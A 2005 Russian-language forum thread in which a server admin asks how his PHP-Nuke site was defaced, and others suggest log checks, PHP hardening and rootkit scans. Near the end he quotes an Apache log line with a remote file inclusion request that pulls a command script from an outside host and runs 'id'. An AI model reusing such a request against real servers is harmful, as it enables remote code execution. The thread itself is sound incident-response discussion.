URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID1
Нить номер: 62506
[ Назад ]

Исходное сообщение
"Хакнули сайт а может сервер? Помогите разобраться."

Отправлено mihas , 07-Дек-05 16:54 
Не совсем уверен в правильности выбора раздела, но уж больно помощь нужна.
Вобщем есть у меня сервер на нем Debian 3.1 На сервере пару сайтов. Все вроде нормально, вчера в 18.00 Вместо главной страницы одного из сайтов вижу надпись Thehacker..... Оказалось этот Thehacker изменил файл index.php У меня еще не большой опыт в администрировании серверов, поэтому прошу помощи. Сам сайт этот работает на phpnuke. Но я уверен, что взломали не сайт, но как получили доступ к этому файлу я никак не разберусь. В логах на то время только следующее

Dec  6 18:00:04 localhost proftpd[22291]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER anonymous: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21
Dec  6 18:00:06 localhost proftpd[22292]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER anonymous: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21
Dec  6 18:00:10 localhost proftpd[22295]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER anonymous: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21
Dec  6 18:00:27 localhost proftpd[22301]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER mick-ashim: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21
Dec  6 18:01:27 localhost proftpd[22334]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER mick-ashim: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21

Вроде как ничего криминального, но время совпадает со временем изменения файла index.php Больше ничего в логах не нашел.
На руткиты проверял, пусто, лишних открытых портов тоже нет. Создается впечатление что вошли по ftp, но как?
Буду очень признателен за помощь.


Содержание

Сообщения в этом обсуждении
"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено pagan , 07-Дек-05 17:19 
скорее всего поломали через дырявый phpnuke. Небось залили web шелл, ну а далее все понятно ;-)
Общая рекомендация: до выяснения того что и как поломали машину отключить от сети.

"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено mihas , 07-Дек-05 17:35 
>скорее всего поломали через дырявый phpnuke. Небось залили web шелл, ну а
>далее все понятно ;-)

Нет, мне к сожалению не понятно. Правда. Если залили, то что он получил, доступ в админку? Пароли? Как содержимое самого файла изменили? Значит доступ по ftp получил?

>Общая рекомендация: до выяснения того что и как поломали машину отключить от сети.

Так весь вопрос в том, как это выяснить. Я уже все логи пересмотрел, ничего, по крайней мере с моей точки зрения, не нашел.


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено Serge , 07-Дек-05 18:17 
Привет!

Сегодня на вывесили на опеннете http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus...


"Работники учебного центра Информзащита перевели на русский язык текст документа "Web Security Threat Classification", в котором классифицированы основные виды атак на web-приложения, с подробным описанием, примерами и рекомендациями по защите."

Читай, может поможет ...


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено mihas , 07-Дек-05 18:45 
>Привет!
>
>Сегодня на вывесили на опеннете http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus...
>
>Читай, может поможет ...

Спасибо почитаю. Может еще кто чем поможет? Что дальше то делать?


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено vvvua , 07-Дек-05 23:52 
Был у меня на хостинге одно время сайт president.com.ua.
Он тоже на нюке. Во время выборов его валили вместе с серваком раз в 2 часа.
DDOS на форум и регистрацию, в основном. Сервак сам по себе не падал, но страницы не грузились.
К нюке есть куча секъюрити патчей - без них это голая жопа в интернете с соответсвующими последствиями.
И вообще, в debian лучше vsftd поставить с чрутом по ману к нему.

А искать нужно в логах на доступ к страницам - в апаче, а не к фтпд.
last -i покажет кто куда входил по ftp.
Если чисто или пропали логи - значит рут шелл был - пора все менять, ЖОПА.


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено mihas , 08-Дек-05 00:15 
>last -i покажет кто куда входил по ftp.

Спасибо. Вот это уже по делу. На ftp значит кроме меня никого не было. По шелу тоже один я был.
Про апач уже понял, пытаюсь что то найти, но пока голяк. Может подскажешь как сузить границы поиска, что именно искать и как можно вообще в логах искать, может какие то команды есть. А то у меня уже глаза выпадают.
А нюку я собирался сносить, как раз другой движок готовлю, думал где то через неделю переезжать и на тебе.



"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено vvvua , 08-Дек-05 00:50 
Вот с этим уже не очень помогу- давно было, запамятовал.
Теоретичеки - посмотреть время модификации файла (ls -l index.php) и ищи его, время т.е., в логах апача.
Кроме того, проверь может ли кто анонимно писать на сервак под фтп.
ЗАКРОЙ фунции system,exec,... в PHP (php.ini править надо апачевский). 90%, что шелл скрипт через него исполнили.

На будущее - поставь tripwire на систему и не забудь на файловые системы прописать в фстабе noatime. Это загрузку винтов уменьшит и трипвайр ругаться не будет.

На админ часть точно пароли спрашивает?
.htaccess работает?
если да, то желательно файл с паролями поместить в поддиректорию и прописать туда
order allow,deny
deny from all
тогда напрямую никто не вломится.


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено mihas , 08-Дек-05 01:45 
>Теоретичеки - посмотреть время модификации файла (ls -l index.php) и ищи его, время т.е., в логах апача.
Время изменения знаю, только пока в тех границах пока ничего не нарыл. >Кроме того, проверь может ли кто анонимно писать на сервак под фтп.
Т.е.? Имеет ли кто анонимный доступ по ftp? Нет.
>На будущее - поставь tripwire на систему и не забудь на файловые
>системы прописать в фстабе noatime. Это загрузку винтов уменьшит и >трипвайр ругаться не будет.
Интересно, я о tripwire первый раз слышу, надо почитать.
>На админ часть точно пароли спрашивает?
>.htaccess работает? если да, то желательно файл с паролями поместить в >поддиректорию и прописать туда
>order allow,deny
>deny from all
>тогда напрямую никто не вломится.
Админка закрыта со всех сторон и через .htaccess тоже. Конфиг файл спрятан за семью замками.
Спасибо за полезную информацию. Буду искать дальше, если что найду отпишусь.



"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено Xmas , 08-Дек-05 04:22 
1. Насчет открытых портов, просканируйте себя из вне nmap'ом каким-ть+демкой XSpider'а
2. на сколько я понял, вы хотите переходить на самописный движок? тоже не советую, по крайней мере сейчас, вот погонять его в тестовом режиме это можно, но сразу ставить не рекомендуется
3. на всякий пожарный пробегитесь chkrootkit'ом авось он все-таки еще че-ть нароет
4. и опять же совет на будущее, как уже подсказали чрутить апач и иже с ними, это конечно не панацея от всех бед, но головной боли будет поменьше :)

"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено joik , 08-Дек-05 08:01 
в принципе правильные советы.
по опыту - ничего не случилось.
скрипткиддисы.
реальный хак никогда бы не вылез наружу. только внутрь. в сердце системы. с добавлением разных скановв, снифоф, баков, шелеф :)
поставь спецом приманку - посмотришь..

"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено mihas , 08-Дек-05 10:44 
>1. Насчет открытых портов, просканируйте себя из вне nmap'ом каким-ть+демкой XSpider'а
nmapom сканил и неоднократно, снутри и снаружи, все в порядке, ничего лишнего не открыто. XSpider вчера запускал, правда не дождался окончания его работы, сайт довольно крупный. А ему вообще можно верить? Он нашел очень много проблем, причем если эти проблемы в нюке, то это понятно, но он нашел также много проблем и на других сайтах, которые работают на коммерческих надежных скриптах.
>2. на сколько я понял, вы хотите переходить на самописный движок? тоже не >советую, по крайней мере сейчас, вот погонять его в тестовом режиме это можно, но сразу ставить не рекомендуется
Нет. Движок не самописный. Коммерческий. У нас он не очень известен, но в Германии один из самых популярных и надежных. Если интересно вот сайт разработчика http://www.woltlab.de/
>3. на всякий пожарный пробегитесь chkrootkit'ом авось он все-таки еще че-ть нароет
Уже раз 10 запускал, говорит пусто.
>4. и опять же совет на будущее, как уже подсказали чрутить апач и иже с ними, это конечно не панацея от всех бед, но головной боли будет поменьше :)
А можно чуть подробнее, я еще не большой спец в этих вопросах. Что такое чрутить я представляю, но как чрутить апач не совсем. Или, если можно,  ссылочку.

>в принципе правильные советы.
>по опыту - ничего не случилось.
>скрипткиддисы.
>реальный хак никогда бы не вылез наружу. только внутрь. в сердце системы.
>с добавлением разных скановв, снифоф, баков, шелеф :)
>поставь спецом приманку - посмотришь..
Поизучав немного материалы, спасибо предыдущим ораторам, все таки склоняюсь к тому, что ломанули нюку и просто переписали index.php Это логично, я давно не обновлял ее, да еще под нюкой phpbb стоит, он тоже версии 2.0.17 хотя вышла уже 2.0.18. Обновляться не хотел, готовлю переход на другой движок, не до этого было.


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено vvvua , 08-Дек-05 11:25 
Точно! Вспомнил! Около 3-х сайтов ломали через phpbb. Там есть возможность поста файла где-то! А потом system его и вперед!

>ломанули нюку и просто переписали index.php Это логично, я давно не
>обновлял ее, да еще под нюкой phpbb стоит, он тоже версии



"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено ram_scan , 08-Дек-05 11:59 
>>ломанули нюку и просто переписали index.php Это логично, я давно не
>>обновлял ее, да еще под нюкой phpbb стоит, он тоже версии

Поставить ин продакшн phpnuke или phpbb имхо может только отбитый во всю голову человек. Потому-что если по рассылке вдруг не анонсится репорт о свежей уязвимости в этих двух горбухах то я начинаю нервничать что "сегодня что-то идет не так". Обычно свежая дыра - каждый день. Эти поделия надо апдейтить раз в сутки, и все равно "ачько узкий-узкий" (c).


"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено mihas , 08-Дек-05 23:48 
Нашел в логах на тот день такую запись
85.98.167.87 - - [06/Dec/2005:19:42:39 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.slototal.com/cmd.dat?&cmd=id HTTP/1.1" 200 5956
Повторяется она раз 7. Но на момент изменения файла index.php в логах пусто.

"Хакнули сайт а может сервер? Помогите разобраться."
Отправлено vvvua , 13-Дек-05 16:52 
>Нашел в логах на тот день такую запись
>85.98.167.87 - - [06/Dec/2005:19:42:39 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.slototal.com/cmd.dat?&cmd=id HTTP/1.1" 200 5956
>Повторяется она раз 7. Но на момент изменения файла index.php в логах
>пусто.
Это тоже хак.
Ссылочку открой, что подставлена в phpbb_root_path...